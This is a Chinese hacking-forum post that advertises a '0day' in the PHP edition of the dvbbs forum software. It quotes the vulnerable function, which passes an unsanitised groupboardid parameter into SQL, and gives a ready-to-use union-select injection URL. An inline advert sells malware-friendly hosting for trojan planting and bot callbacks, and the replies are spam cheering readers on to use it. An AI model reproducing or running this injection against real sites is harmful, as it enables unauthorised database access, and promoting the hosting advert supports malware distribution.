返回列表 回复 发帖

dvbbs之PHP版本0day

  1. function brule() {
  2. global $dv,$db,$boardid,$lang,$groupboardid;
  3. $groupboardid=$_GET['groupboardid'];
  4. if(!empty($_GET['groupboardid'])){
  5. $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
  6. }
  7. else{
  8. $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
  9. }
复制代码
直接获得变量groupboardid,不为空就直接带入查询导致注入。
  1. http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*
复制代码
最新推出黑客免杀空间15元/月,支持ASP收信、挂马、上线等. 点击申请

顶顶顶好帖子,我现在就去刷

顶顶顶好帖子,我现在就去刷顶顶顶好帖子,我现在就去刷

好,的的我现在就去看看

好,的的我现在就去看看

不容怀疑的数学

提示: 作者被禁止或删除 内容自动屏蔽
返回列表